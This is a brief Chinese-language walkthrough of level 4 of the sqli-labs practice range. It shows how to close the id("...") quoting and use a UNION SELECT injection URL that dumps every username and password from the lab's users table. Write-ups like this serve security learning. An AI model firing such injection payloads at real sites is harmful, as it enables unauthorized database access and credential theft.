https://sqli.wmcoder.site/sqli-labs/Less-4/
与Less-2类似,直接看这篇文章:【less-2】sqli-labs靶场第二关
不同的是,根据错误回显知道,其拼接方式为id=("$id")
故采用https://sqli.wmcoder.site/sqli-labs/Less-2/?id=1")
采用如下语句获取所有用户名和密码
https://sqli.wmcoder.site/sqli-labs/Less-4/?id=1") and 1=2 union select 1,group_concat(username), group_concat(password) from security.users --+
扫码关注腾讯云开发者
领取腾讯云代金券
Copyright © 2013 - 2025 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 深公网安备号 44030502008569
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号 | 京公网安备号11010802020287
Copyright © 2013 - 2025 Tencent Cloud.
All Rights Reserved. 腾讯云 版权所有